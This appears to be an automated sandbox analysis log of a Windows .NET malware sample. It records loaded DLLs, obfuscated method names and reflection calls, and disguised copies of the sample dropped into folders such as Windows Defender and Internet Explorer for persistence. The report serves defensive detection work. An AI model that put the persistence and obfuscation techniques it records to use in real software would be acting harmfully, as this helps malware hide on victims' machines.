                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Directory created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Directory created: C:\Program Files\Windows Multimedia Platform\0b77faa1f189a8
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Directory created: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Directory created: C:\Program Files\Windows Defender\0b77faa1f189a8
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Directory created: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Directory created: C:\Program Files\Internet Explorer\en-GB\0b77faa1f189a8
                            Source: KPFv8ATDx0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: KPFv8ATDx0.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: KPFv8ATDx0.exe Static file information: File size 2882048 > 1048576
                            Source: KPFv8ATDx0.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2bf200
                            Source: KPFv8ATDx0.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbL source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1867465458.000000001C9A0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbP source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBC9000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.cs.Net Code: Type.GetTypeFromHandle(veIX2WBfcHAjKFSyqO0.RXSkWJnklKG(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(veIX2WBfcHAjKFSyqO0.RXSkWJnklKG(16777246)),Type.GetTypeFromHandle(veIX2WBfcHAjKFSyqO0.RXSkWJnklKG(16777260))})
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7A2547 push eax; ret 0_2_00007FFAAC7A2548
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7A2551 push eax; ret 0_2_00007FFAAC7A2552
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 0_2_00007FFAAC7A3AEC push E8FFFFFCh; retf 0_2_00007FFAAC7A3AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7D2547 push eax; ret 7_2_00007FFAAC7D2548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7D2551 push eax; ret 7_2_00007FFAAC7D2552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAAC7D3AEC push E8FFFFFCh; retf 7_2_00007FFAAC7D3AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 7_2_00007FFAACCE7562 push ebx; iretd 7_2_00007FFAACCE756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC802547 push eax; ret 14_2_00007FFAAC802548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC802551 push eax; ret 14_2_00007FFAAC802552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAAC803AEC push E8FFFFFCh; retf 14_2_00007FFAAC803AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD17563 push ebx; iretd 14_2_00007FFAACD1756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD06A85 push eax; iretd 14_2_00007FFAACD06AAA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD06E5D push edx; iretd 14_2_00007FFAACD06E9A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0761D push esp; iretd 14_2_00007FFAACD0763A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0783D push ebp; iretd 14_2_00007FFAACD0787A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0745D push ebx; iretd 14_2_00007FFAACD0747A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD0000B push cs; iretd 14_2_00007FFAACD0007A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 14_2_00007FFAACD07FF5 push edi; iretd 14_2_00007FFAACD0801A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8A2551 push eax; ret 20_2_00007FFAAC8A2552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8A2547 push eax; ret 20_2_00007FFAAC8A2548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAAC8A3AEC push E8FFFFFCh; retf 20_2_00007FFAAC8A3AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 20_2_00007FFAACDB7563 push ebx; iretd 20_2_00007FFAACDB756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC649B95 push ss; iretd 26_2_00007FFAAC649B9D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC892551 push eax; ret 26_2_00007FFAAC892552
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC892547 push eax; ret 26_2_00007FFAAC892548
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAAC893AEC push E8FFFFFCh; retf 26_2_00007FFAAC893AF1
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 26_2_00007FFAACDA7563 push ebx; iretd 26_2_00007FFAACDA756A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC676504 push edi; iretd 34_2_00007FFAAC676505
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC6751AE push es; iretd 34_2_00007FFAAC6751AF
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC6765E1 push esp; ret 34_2_00007FFAAC6765E8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC69276C push E8FFFFFEh; ret 34_2_00007FFAAC692771
                            Source: KPFv8ATDx0.exe, tpqnt90FpZcrRC8ZHbx.csHigh entropy of concatenated method names: 'KSM0UfF7Dn', 'zAn0doLN3R', 'Hri06cIsQu', 'lCG0KaeOdP', 'Slr0NPFTB3', 'NLI0ibT82w', 'DnK0qpMP3a', 'nYY00Uos8v', 'IXf5iK8CIriTrbheiXs4', 'EPuvvX8CP86qg0AQud1n'
                            Source: KPFv8ATDx0.exe, oPrXaY5D9MMLZafQbdA.csHigh entropy of concatenated method names: 'm4t5d6mkBj', 'mNu56bnx8l', 'iZt5KqqLyt', 'NtiFLd8st13dtX5aL826', 'g1GYah8s4urAfYBDyVyG', 'LANRnd8sP1ODrc6X6XLi', 'F7FliF8sIqjeU0ijm4Rq', 'AKR5mZ4nEa', 'HPp5cy0cH3', 'kQl5yMrYVv'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File written: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
